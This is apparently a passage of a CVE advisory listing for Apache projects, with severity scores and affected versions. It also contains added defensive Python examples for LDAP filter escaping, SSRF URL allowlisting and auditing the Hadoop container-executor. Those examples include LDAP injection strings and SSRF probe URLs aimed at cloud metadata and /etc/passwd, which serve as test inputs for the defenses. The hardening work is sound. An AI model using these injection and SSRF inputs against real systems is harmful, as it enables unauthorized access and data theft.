nvd@nist.gov 4.3 MEDIUM CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N 2.8 1.4

Products Affected

Vendor Product Version
apache fineract *
CVE-2023-25197

Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in Apache Software Foundation Apache Fineract. Authorized users may be able to exploit this for limited impact on components. This issue affects Apache Fineract: from 1.4 through 1.8.2.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 6.3 MEDIUM CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L 2.8 3.4

Products Affected

Vendor Product Version
apache fineract *
CVE-2023-25504

A malicious actor who has been authenticated and granted specific permissions in Apache Superset may use the import dataset feature in order to conduct Server-Side Request Forgery attacks and query internal resources on behalf of the server where Superset is deployed. This vulnerability exists in Apache Superset versions up to and including 2.0.1.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
security@apache.org 4.9 MEDIUM CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:N/A:N 1.2 3.6

Products Affected

Vendor Product Version
apache superset *
CVE-2023-25601

On version 3.0.0 through 3.1.1, Apache DolphinScheduler's python gateway suffered from improper authentication: an attacker could use a socket bytes attack without authentication. This issue has been fixed from version 3.1.2 onwards. For users who use version 3.0.0 to 3.1.1, you can turn off the python-gateway function by changing the value `python-gateway.enabled=false` in configuration file `application.yaml`. If you are using the python gateway, please upgrade to version 3.1.2 or above.

Products Affected

Vendor Product Version
apache dolphinscheduler *
CVE-2023-25613

An LDAP Injection vulnerability exists in the LdapIdentityBackend of Apache Kerby before 2.0.3. 
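Both this Kerby advisory and the Derby LDAP-authentication advisory above are instances of one defect: a caller-supplied username spliced into an LDAP search filter without the escaping RFC 4515 requires. The following is an added illustration, not code from either project: it builds the filter the naive way and the escaped way and shows, with constructed usernames, how a wildcard or an extra clause changes what the directory matches. The filter template is an assumption.

```python
# Added illustration of the LDAP filter injection class behind the Derby and
# Kerby advisories. Not code from either project: the filter template is an
# assumption and the usernames are constructed test inputs.
import re

# RFC 4515, section 3: characters that must be escaped inside an assertion value
_FILTER_ESCAPES = {
    "\\": r"\5c",
    "*": r"\2a",
    "(": r"\28",
    ")": r"\29",
    "\x00": r"\00",
}


def escape_ldap_filter_value(value: str) -> str:
    """Escape a string for use as an assertion value in an LDAP search filter."""
    return "".join(_FILTER_ESCAPES.get(ch, ch) for ch in value)


def unsafe_user_filter(username: str) -> str:
    """Vulnerable pattern: the raw username is spliced into the filter."""
    return f"(&(objectClass=person)(uid={username}))"


def safe_user_filter(username: str) -> str:
    """Hardened pattern: the username is escaped before it is spliced in."""
    return f"(&(objectClass=person)(uid={escape_ldap_filter_value(username)}))"


def count_uid_assertions(ldap_filter: str) -> int:
    """Number of '(uid=' assertions in the filter. The template has exactly one;
    a higher count means user input changed the filter's structure."""
    return len(re.findall(r"\(uid=", ldap_filter))


def has_wildcard_uid(ldap_filter: str) -> bool:
    """True if the uid assertion contains an unescaped '*', i.e. it matches any user."""
    return re.search(r"\(uid=[^)]*\*", ldap_filter) is not None


if __name__ == "__main__":
    for name in ("alice", "*", "alice)(uid=admin"):   # constructed inputs
        print(f"{name!r:22} unsafe: {unsafe_user_filter(name)}")
        print(f"{'':22} safe:   {safe_user_filter(name)}")
```

The two checks at the end are what a code reviewer would look for in an authenticator: the escaped filter always contains exactly one `(uid=` assertion and never an unescaped `*`, whichever username is supplied. Values that go into a DN rather than a filter need the separate escaping rules of RFC 4514; do not reuse this function for them.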

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 9.8 CRITICAL CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H 3.9 5.9

Products Affected

Vendor Product Version
apache kerby *
apache identity_backend *
apache kerby_ldap_backend *
CVE-2023-25621

Privilege Escalation vulnerability in Apache Software Foundation Apache Sling. Any content author is able to create i18n dictionaries in the repository in a location the author has write access to. As these translations are used across the whole product, it allows an author to change any text or dialog in the product. For example, an attacker might fool someone by changing the text on a delete button to "Info". This issue affects the i18n module of Apache Sling up to version 2.5.18. Version 2.6.2 and higher limit i18n dictionaries by default to certain paths in the repository (/libs and /apps). Users of the module are advised to update to version 2.6.2 or higher, check the configuration for resource loading and then adjust the access permissions for the configured path accordingly.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 6.5 MEDIUM CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:N 2.8 3.6

Products Affected

Vendor Product Version
apache sling_i18n *
CVE-2023-25690

Some mod_proxy configurations on Apache HTTP Server versions 2.4.0 through 2.4.55 allow an HTTP Request Smuggling attack. Configurations are affected when mod_proxy is enabled along with some form of RewriteRule or ProxyPassMatch in which a non-specific pattern matches some portion of the user-supplied request-target (URL) data and is then re-inserted into the proxied request-target using variable substitution. For example, something like:

    RewriteEngine on
    RewriteRule "^/here/(.*)" "http://example.com:8080/elsewhere?$1" [P]
    ProxyPassReverse /here/ http://example.com:8080/

Request splitting/smuggling could result in bypass of access controls in the proxy server, proxying unintended URLs to existing origin servers, and cache poisoning. Users are recommended to update to at least version 2.4.56 of Apache HTTP Server.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 9.8 CRITICAL CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H 3.9 5.9

Products Affected

Vendor Product Version
apache http_server *
CVE-2023-25691

Improper Input Validation vulnerability in the Apache Airflow Google Provider. This issue affects Apache Airflow Google Provider versions before 8.10.0.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 9.8 CRITICAL CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H 3.9 5.9

Products Affected

Vendor Product Version
apache apache-airflow-providers-google *
CVE-2023-25692

Improper Input Validation vulnerability in the Apache Airflow Google Provider. This issue affects Apache Airflow Google Provider versions before 8.10.0.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 7.5 HIGH CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H 3.9 3.6

Products Affected

Vendor Product Version
apache apache-airflow-providers-google *
CVE-2023-25693

Improper Input Validation vulnerability in the Apache Airflow Sqoop Provider. This issue affects Apache Airflow Sqoop Provider versions before 3.1.1.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 9.8 CRITICAL CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H 3.9 5.9

Products Affected

Vendor Product Version
apache airflow_sqoop_provider *
apache apache-airflow-providers-apache-sqoop *
CVE-2023-25695

Generation of Error Message Containing Sensitive Information vulnerability in Apache Software Foundation Apache Airflow. This issue affects Apache Airflow: before 2.5.2.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 5.3 MEDIUM CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N 3.9 1.4

Products Affected

Vendor Product Version
apache airflow *
CVE-2023-25696

Improper Input Validation vulnerability in the Apache Airflow Hive Provider. This issue affects Apache Airflow Hive Provider versions before 5.1.3.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 9.8 CRITICAL CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H 3.9 5.9

Products Affected

Vendor Product Version
apache airflow_hive_provider *
apache apache-airflow-providers-apache-hive *
CVE-2023-25753

There exists an SSRF (Server-Side Request Forgery) vulnerability located at the /sandbox/proxyGateway endpoint. This vulnerability allows us to manipulate arbitrary requests and retrieve corresponding responses by inputting any URL into the requestUrl parameter. Of particular concern is our ability to exert control over the HTTP method, cookies, IP address, and headers. This effectively grants us the capability to dispatch complete HTTP requests to hosts of our choosing. This issue affects Apache ShenYu: 2.5.1. Upgrade to Apache ShenYu 2.6.0 or apply the patch https://github.com/apache/shenyu/pull/4776.
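The ShenYu gateway above, and the CXF (CVE-2022-46364), Fineract (CVE-2023-25195) and Superset (CVE-2023-25504) advisories earlier on this page, all come down to a server fetching a URL a caller chose. The control they call for is the same in each case: decide, before connecting, whether the destination is one the server is meant to reach. The following is an added example, not code from any of those projects. The allowed hosts are an assumption. It checks only what can be verified offline; a deployment must also resolve the name and re-check the resulting address at connect time (the second function), otherwise DNS rebinding gets around the hostname check.

```python
# Added example, not code from CXF, Fineract, Superset or ShenYu: an allowlist
# check for a caller-supplied URL before the server fetches it. ALLOWED_HOSTS is
# an assumption for the example.
import ipaddress
from typing import Tuple
from urllib.parse import urlsplit

ALLOWED_SCHEMES = frozenset({"http", "https"})
ALLOWED_HOSTS = frozenset({"api.partner.example", "files.partner.example"})  # assumption


def address_is_internal(ip) -> bool:
    """True for any address a server should never contact on a user's behalf:
    RFC 1918 / ULA ranges, loopback, link-local (cloud metadata sits at
    169.254.169.254), multicast, reserved and unspecified."""
    return (ip.is_private or ip.is_loopback or ip.is_link_local
            or ip.is_multicast or ip.is_reserved or ip.is_unspecified)


def check_outbound_url(url: str) -> Tuple[bool, str]:
    """Decide whether a proxy or gateway may fetch `url`. Returns (allowed, reason)."""
    try:
        parts = urlsplit(url)
        host = parts.hostname      # lower-cased; brackets stripped from IPv6 literals
        _ = parts.port             # raises ValueError on a malformed port
    except ValueError as exc:
        return False, f"unparseable URL: {exc}"
    if parts.scheme.lower() not in ALLOWED_SCHEMES:
        return False, f"scheme {parts.scheme!r} not allowed"
    if not host:
        return False, "no host"
    if parts.username is not None or parts.password is not None:
        # "http://api.partner.example@10.0.0.1/" puts the allowlisted name in the
        # userinfo and the real target after the '@'; refuse userinfo outright.
        return False, "credentials embedded in URL"
    try:
        ip = ipaddress.ip_address(host)
    except ValueError:
        ip = None
    if ip is not None:
        # Literal addresses bypass the hostname allowlist, so refuse them all;
        # name the internal case separately so the log is useful to responders.
        if address_is_internal(ip):
            return False, f"literal address {ip} is internal"
        return False, "IP literals are not allowed; use an allowlisted hostname"
    if host not in ALLOWED_HOSTS:
        return False, f"host {host!r} not on allowlist"
    return True, "ok"


def check_resolved_address(ip_text: str) -> bool:
    """Second gate, applied to the address the allowlisted name actually resolved
    to (or to the socket's peer address once connected): reject anything internal."""
    try:
        return not address_is_internal(ipaddress.ip_address(ip_text))
    except ValueError:
        return False


if __name__ == "__main__":
    for candidate in ("https://api.partner.example/v1/report?x=1",
                      "http://169.254.169.254/latest/meta-data/",
                      "http://[::1]/", "file:///etc/passwd",
                      "http://api.partner.example@10.0.0.1/"):
        print(candidate, "->", check_outbound_url(candidate))
```

Apply `check_outbound_url` to the parameter the user controls (the `requestUrl` of the ShenYu endpoint, the XOP href in CXF, the import URL in Superset) and `check_resolved_address` to every address the HTTP client is about to connect to, including each hop of a redirect chain; redirects are the usual way an allowlisted host is turned back into an internal one.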

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 6.5 MEDIUM CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N 3.9 2.5

Products Affected

Vendor Product Version
apache shenyu 2.5.1
CVE-2023-25754

Privilege Context Switching Error vulnerability in Apache Software Foundation Apache Airflow. This issue affects Apache Airflow: before 2.6.0.

Products Affected

Vendor Product Version
apache airflow *
CVE-2023-25956

Generation of Error Message Containing Sensitive Information vulnerability in the Apache Airflow AWS Provider. This issue affects Apache Airflow AWS Provider versions before 7.2.1.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 7.5 HIGH CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N 3.9 3.6

Products Affected

Vendor Product Version
apache apache-airflow-providers-amazon *
CVE-2023-26031

Relative library resolution in the Linux container-executor binary in Apache Hadoop 3.3.1 to 3.3.4 on Linux allows a local user to gain root privileges. If the YARN cluster is accepting work from remote (authenticated) users, this MAY permit remote users to gain root privileges. Hadoop 3.3.0 updated "YARN Secure Containers" (https://hadoop.apache.org/docs/stable/hadoop-yarn/hadoop-yarn-site/SecureContainer.html) to add a feature for executing user-submitted applications in isolated Linux containers. The native binary HADOOP_HOME/bin/container-executor is used to launch these containers; it must be owned by root and have the suid bit set in order for the YARN processes to run the containers as the specific users submitting the jobs. The patch YARN-10495 (https://issues.apache.org/jira/browse/YARN-10495, "make the rpath of container-executor configurable") modified the library loading path for loading .so files from "$ORIGIN/" to "$ORIGIN/:../lib/native/". This is a path through which libcrypto.so is located. Thus it is possible for a user with reduced privileges to install a malicious libcrypto library into a path to which they have write access, invoke the container-executor command, and have their modified library executed as root. If the YARN cluster is accepting work from remote (authenticated) users, and these users' submitted jobs are executed on the physical host rather than in a container, then the CVE permits remote users to gain root privileges. The fix for the vulnerability is to revert the change, which is done in YARN-11441 (https://issues.apache.org/jira/browse/YARN-11441, "Revert YARN-10495"). This patch is in hadoop-3.3.5.

To determine whether a version of container-executor is vulnerable, use the readelf command. If the RUNPATH or RPATH value contains the relative path "../lib/native/" then it is at risk:

    $ readelf -d container-executor|grep 'RUNPATH\|RPATH'
    0x000000000000001d (RUNPATH)           Library runpath: [$ORIGIN/:../lib/native/]

If it does not, then it is safe:

    $ readelf -d container-executor|grep 'RUNPATH\|RPATH'
    0x000000000000001d (RUNPATH)           Library runpath: [$ORIGIN/]

For an at-risk version of container-executor to enable privilege escalation, the owner must be root and the suid bit must be set:

    $ ls -laF /opt/hadoop/bin/container-executor
    ---Sr-s---. 1 root hadoop 802968 May 9 20:21 /opt/hadoop/bin/container-executor

A safe installation lacks the suid bit and ideally is also not owned by root:

    $ ls -laF /opt/hadoop/bin/container-executor
    -rwxr-xr-x. 1 yarn hadoop 802968 May 9 20:21 /opt/hadoop/bin/container-executor

This configuration does not support YARN Secure Containers, but all other Hadoop services, including YARN job execution outside secure containers, continue to work.
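The two manual checks above (search path from `readelf -d`, then owner and suid bit) are easy to script for a fleet. The following is an added audit helper, not part of Hadoop: it parses `readelf -d` output for RUNPATH/RPATH entries, flags any entry the loader would resolve relative to the caller's working directory or outside the binary's own directory, and combines that with the ownership check. The readelf strings are constructed from the advisory's two cases; the modes and uids paired with them are assumptions for the example.

```python
# Added audit helper, not part of Hadoop: applies the advisory's two checks to a
# container-executor binary. Sample readelf output is constructed from the two
# cases in the advisory; file modes and uids are assumptions for the example.
import os
import re
import stat
import subprocess
from typing import List, Tuple

_RPATH_LINE = re.compile(r"\((?:RUNPATH|RPATH)\)\s+Library r(?:un)?path:\s*\[([^\]]*)\]")


def runpath_entries(readelf_output: str) -> List[str]:
    """Colon-separated search entries from any RUNPATH/RPATH line of `readelf -d`."""
    entries: List[str] = []
    for line in readelf_output.splitlines():
        m = _RPATH_LINE.search(line)
        if m:
            entries.extend(e for e in m.group(1).split(":") if e)
    return entries


def risky_entries(entries: List[str]) -> List[str]:
    """Entries the dynamic loader resolves somewhere a less-privileged user may
    control: a relative path (resolved against the caller's current directory, as
    '../lib/native/' is) or any entry that climbs out of the binary's own directory."""
    risky = []
    for e in entries:
        anchored = e.startswith("/") or e.startswith("$ORIGIN") or e.startswith("${ORIGIN}")
        climbs = ".." in e.split("/")
        if not anchored or climbs:
            risky.append(e)
    return risky


def is_setuid_root(mode: int, uid: int) -> bool:
    return uid == 0 and bool(mode & stat.S_ISUID)


def assess(readelf_output: str, mode: int, uid: int) -> Tuple[str, List[str]]:
    """Only a risky search path on a setuid-root binary yields root; a risky path
    without setuid root is reported but is not exploitable for privilege escalation."""
    bad = risky_entries(runpath_entries(readelf_output))
    if bad and is_setuid_root(mode, uid):
        return "VULNERABLE", bad
    if bad:
        return "AT-RISK-PATH-BUT-NOT-SETUID-ROOT", bad
    return "SAFE", []


def audit_file(path: str) -> Tuple[str, List[str]]:
    """Run the same assessment against a real binary (needs readelf on PATH)."""
    out = subprocess.run(["readelf", "-d", path], check=True,
                         capture_output=True, text=True).stdout
    st = os.stat(path)
    return assess(out, st.st_mode, st.st_uid)


# Constructed from the advisory's two readelf outputs
VULNERABLE_READELF = "0x000000000000001d (RUNPATH)           Library runpath: [$ORIGIN/:../lib/native/]"
SAFE_READELF = "0x000000000000001d (RUNPATH)           Library runpath: [$ORIGIN/]"
# Assumed modes: setuid+setgid, root-owned (0o6050) versus plain 0o755 owned by uid 1001
SETUID_ROOT_MODE, PLAIN_MODE = 0o6050, 0o755

if __name__ == "__main__":
    import sys
    if len(sys.argv) > 1:
        print(audit_file(sys.argv[1]))
    else:
        print(assess(VULNERABLE_READELF, SETUID_ROOT_MODE, 0))
        print(assess(SAFE_READELF, SETUID_ROOT_MODE, 0))
```

`python audit.py /opt/hadoop/bin/container-executor` on each node gives a one-line verdict; the `$ORIGIN/../...` form is flagged as well as the bare relative path, since it also escapes the binary's directory into one that may have looser permissions.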

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 7.5 HIGH CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H 1.6 5.9

Products Affected

Vendor Product Version
apache hadoop *
CVE-2023-26268

Design documents with matching document IDs, from databases on the same cluster, may share a mutable JavaScript environment when using these design document functions:
* validate_doc_update
* list
* filter
* filter views (using view functions as filters)
* rewrite
* update
This doesn't affect map/reduce or search (Dreyfus) index functions. Users are recommended to upgrade to a version that is no longer affected by this issue (Apache CouchDB 3.3.2 or 3.2.3). Workaround: Avoid using design documents from untrusted sources which may attempt to cache or store data in the JavaScript environment.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
security@apache.org 4.4 MEDIUM CVSS:3.1/AV:N/AC:H/PR:L/UI:R/S:C/C:L/I:L/A:N 1.3 2.7

Products Affected

Vendor Product Version
apache couchdb *
ibm cloudant *
CVE-2023-26269

Apache James server version 3.7.3 and earlier provides a JMX management service without authentication by default. This allows privilege escalation by a malicious local user. Administrators are advised to disable JMX, or set up a JMX password. Note that version 3.7.4 onward will set up a JMX password automatically for Guice users.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 7.8 HIGH CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H 1.8 5.9

Products Affected

Vendor Product Version
apache james *
CVE-2023-26464

** UNSUPPORTED WHEN ASSIGNED ** When using the Chainsaw or SocketAppender components with Log4j 1.x on JRE less than 1.7, an attacker that manages to cause a logging entry involving a specially-crafted (ie, deeply nested) hashmap or hashtable (depending on which logging component is in use) to be processed could exhaust the available memory in the virtual machine and achieve Denial of Service when the object is deserialized. This issue affects Apache Log4j before 2. Affected users are recommended to update to Log4j 2.x. NOTE: This vulnerability only affects products that are no longer supported by the maintainer.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 7.5 HIGH CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H 3.9 3.6

Products Affected

Vendor Product Version
apache log4j *
CVE-2023-26512

CWE-502 Deserialization of Untrusted Data in the rabbitmq-connector plugin module of Apache EventMesh (incubating) V1.7.0 and V1.8.0 on Windows, Linux, macOS and other platforms allows attackers to send controlled messages and achieve remote code execution via RabbitMQ messages. Users can use the code under the master branch in the project repo to fix this issue; a new version will be released as soon as possible.

Products Affected

Vendor Product Version
apache eventmesh *
apache eventmesh-connector-rabbitmq *
CVE-2023-26513

Excessive Iteration vulnerability in Apache Software Foundation Apache Sling Resource Merger. This issue affects Apache Sling Resource Merger: from 1.2.0 before 1.4.2.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
security@apache.org 7.5 HIGH CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H 3.9 3.6
nvd@nist.gov 7.5 HIGH CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H 3.9 3.6

Products Affected

Vendor Product Version
apache sling_resource_merger *
CVE-2023-27296

Deserialization of Untrusted Data vulnerability in Apache Software Foundation Apache InLong. It can be triggered by authenticated users of InLong; refer to [1] for more about this class of vulnerability. This issue affects Apache InLong: from 1.1.0 through 1.5.0. Users are advised to upgrade to Apache InLong's latest version or cherry-pick [2] to solve it. [1] https://programmer.help/blogs/jdbc-deserialization-vulnerability-learning.html [2] https://github.com/apache/inlong/pull/7422

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 8.8 HIGH CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H 2.8 5.9

Products Affected

Vendor Product Version
apache inlong *
CVE-2023-27522

HTTP Response Smuggling vulnerability in Apache HTTP Server via mod_proxy_uwsgi. This issue affects Apache HTTP Server: from 2.4.30 through 2.4.55. Special characters in the origin response header can truncate/split the response forwarded to the client.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 7.5 HIGH CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N 3.9 3.6

Products Affected

Vendor Product Version
apache http_server *
unbit uwsgi *
debian debian_linux 10.0
CVE-2023-27523

Improper data authorization check on Jinja templated queries in Apache Superset up to and including 2.1.0 allows for an authenticated user to issue queries on database tables they may not have access to.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
security@apache.org 5.0 MEDIUM CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:N/A:N 3.1 1.4
nvd@nist.gov 4.3 MEDIUM CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N 2.8 1.4

Products Affected

Vendor Product Version
apache superset *
CVE-2023-27524

Session Validation attacks in Apache Superset versions up to and including 2.0.1. Installations that have not altered the default configured SECRET_KEY according to the installation instructions allow an attacker to authenticate and access unauthorized resources. This does not affect Superset administrators who have changed the default value for the SECRET_KEY config. All Superset installations should always set a unique, secure, random SECRET_KEY. Your SECRET_KEY is used to securely sign all session cookies and to encrypt sensitive information in the database. Add a strong SECRET_KEY to your `superset_config.py` file like: SECRET_KEY = <YOUR_OWN_RANDOM_GENERATED_SECRET_KEY> Alternatively you can set it with the `SUPERSET_SECRET_KEY` environment variable.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
security@apache.org 8.9 HIGH CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:C/C:H/I:H/A:L 2.2 6.0

Products Affected

Vendor Product Version
apache superset *
CVE-2023-27525

An authenticated user with Gamma role authorization could have access to metadata information using non-trivial methods in Apache Superset up to and including 2.0.1.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
security@apache.org 3.1 LOW CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:L/I:N/A:N 1.6 1.4

Products Affected

Vendor Product Version
apache superset *
CVE-2023-27526

A non-Admin authenticated user could incorrectly create resources using the import charts feature in Apache Superset up to and including 2.1.0.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
security@apache.org 4.3 MEDIUM CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N 2.8 1.4
nvd@nist.gov 4.3 MEDIUM CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N 2.8 1.4

Products Affected

Vendor Product Version
apache superset *
CVE-2023-27602

In Apache Linkis <=1.3.1, the PublicService module uploads files without restrictions on the upload path or the file type. We recommend users upgrade the version of Linkis to version 1.3.2. For versions <=1.3.1, we suggest turning on the file path check switches in linkis.properties: `wds.linkis.workspace.filesystem.owner.check=true` and `wds.linkis.workspace.filesystem.path.check=true`

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 9.8 CRITICAL CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H 3.9 5.9

Products Affected

Vendor Product Version
apache linkis *
CVE-2023-27603

In Apache Linkis <=1.3.1, the Manager module's engineConn material upload does not check the zip entry path. This is a Zip Slip issue, which can lead to a potential RCE vulnerability. We recommend users upgrade the version of Linkis to version 1.3.2.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 9.8 CRITICAL CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H 3.9 5.9

Products Affected

Vendor Product Version
apache linkis *
CVE-2023-27604

Apache Airflow Sqoop Provider, versions before 4.0.0, is affected by a vulnerability that allows an attacker to pass parameters with the connections, which makes it possible to implement RCE attacks via ‘sqoop import --connect’, obtain Airflow server permissions, etc. The attacker needs to be logged in and have authorization (permissions) to create/edit connections. It is recommended to upgrade to a version that is not affected. This issue was reported independently by happyhacking-k, and Xie Jianming and LiuHui of Caiji Sec Team also reported it.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 8.8 HIGH CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H 2.8 5.9
134c704f-9b21-4f2e-91b3-4a467353bcc0 8.8 HIGH CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H 2.8 5.9

Products Affected

Vendor Product Version
apache airflow_sqoop_provider *
CVE-2023-27987

In Apache Linkis <=1.3.1, the default token generated by the Linkis Gateway deployment is too simple, so it is easy for attackers to obtain the default token for an attack. Generation rules should add random values. We recommend users upgrade the version of Linkis to version 1.3.2 and modify the default token value. You can refer to Token authorization [1]. [1] https://linkis.apache.org/docs/latest/auth/token

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 9.1 CRITICAL CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N 3.9 5.2

Products Affected

Vendor Product Version
apache linkis *
CVE-2023-28158

Privilege escalation via stored XSS using the file upload service to upload malicious content. The issue can be exploited only by authenticated users who can create a directory name, inject XSS content through it, and gain privileges such as those of the admin user.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 5.4 MEDIUM CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N 2.3 2.7
security@apache.org 6.5 MEDIUM CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:L 2.3 3.7

Products Affected

Vendor Product Version
apache archiva *
CVE-2023-28326

Attacker can elevate their privileges in any room. Vendor: The Apache Software Foundation. Versions Affected: Apache OpenMeetings from 2.0.0 before 7.0.0.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 9.8 CRITICAL CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H 3.9 5.9

Products Affected

Vendor Product Version
apache openmeetings *
CVE-2023-28625

mod_auth_openidc is an authentication and authorization module for the Apache 2.x HTTP server that implements the OpenID Connect Relying Party functionality. In versions 2.0.0 through 2.4.13.1, when `OIDCStripCookies` is set and a crafted cookie supplied, a NULL pointer dereference would occur, resulting in a segmentation fault. This could be used in a Denial-of-Service attack and thus presents an availability risk. Version 2.4.13.2 contains a patch for this issue. As a workaround, avoid using `OIDCStripCookies`.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 7.5 HIGH CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H 3.9 3.6
security-advisories@github.com 7.5 HIGH CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H 3.9 3.6

Products Affected

Vendor Product Version
apache http_server *
openidc mod_auth_openidc *
CVE-2023-28706

Improper Control of Generation of Code ('Code Injection') vulnerability in Apache Software Foundation Apache Airflow Hive Provider. This issue affects Apache Airflow Hive Provider: before 6.0.0.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 9.8 CRITICAL CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H 3.9 5.9

Products Affected

Vendor Product Version
apache airflow_hive_provider *
CVE-2023-28707

Improper Input Validation vulnerability in Apache Software Foundation Apache Airflow Drill Provider. This issue affects Apache Airflow Drill Provider: before 2.3.2.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 7.5 HIGH CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N 3.9 3.6

Products Affected

Vendor Product Version
apache apache-airflow-providers-apache-drill *
apache airflow_drill_provider *
CVE-2023-28708

When using the RemoteIpFilter with requests received from a reverse proxy via HTTP that include the X-Forwarded-Proto header set to https, session cookies created by Apache Tomcat 11.0.0-M1 to 11.0.0-M2, 10.1.0-M1 to 10.1.5, 9.0.0-M1 to 9.0.71 and 8.5.0 to 8.5.85 did not include the secure attribute. This could result in the user agent transmitting the session cookie over an insecure channel. Older, EOL versions may also be affected.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 4.3 MEDIUM CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:N/A:N 2.8 1.4

Products Affected

Vendor Product Version
apache tomcat *
apache tomcat 11.0.0
CVE-2023-28709

The fix for CVE-2023-24998 was incomplete for Apache Tomcat 11.0.0-M2 to 11.0.0-M4, 10.1.5 to 10.1.7, 9.0.71 to 9.0.73 and 8.5.85 to 8.5.87. If non-default HTTP connector settings were used such that the maxParameterCount could be reached using query string parameters and a request was submitted that supplied exactly maxParameterCount parameters in the query string, the limit for uploaded request parts could be bypassed with the potential for a denial of service to occur.

Products Affected

Vendor Product Version
apache tomcat *
apache tomcat 11.0.0
netapp 7-mode_transition_tool -
debian debian_linux 12.0
CVE-2023-28710

Improper Input Validation vulnerability in Apache Software Foundation Apache Airflow Spark Provider. This issue affects Apache Airflow Spark Provider: before 4.0.1.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 7.5 HIGH CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N 3.9 3.6

Products Affected

Vendor Product Version
apache apache-airflow-providers-apache-spark *
apache airflow_spark_provider *
CVE-2023-28754

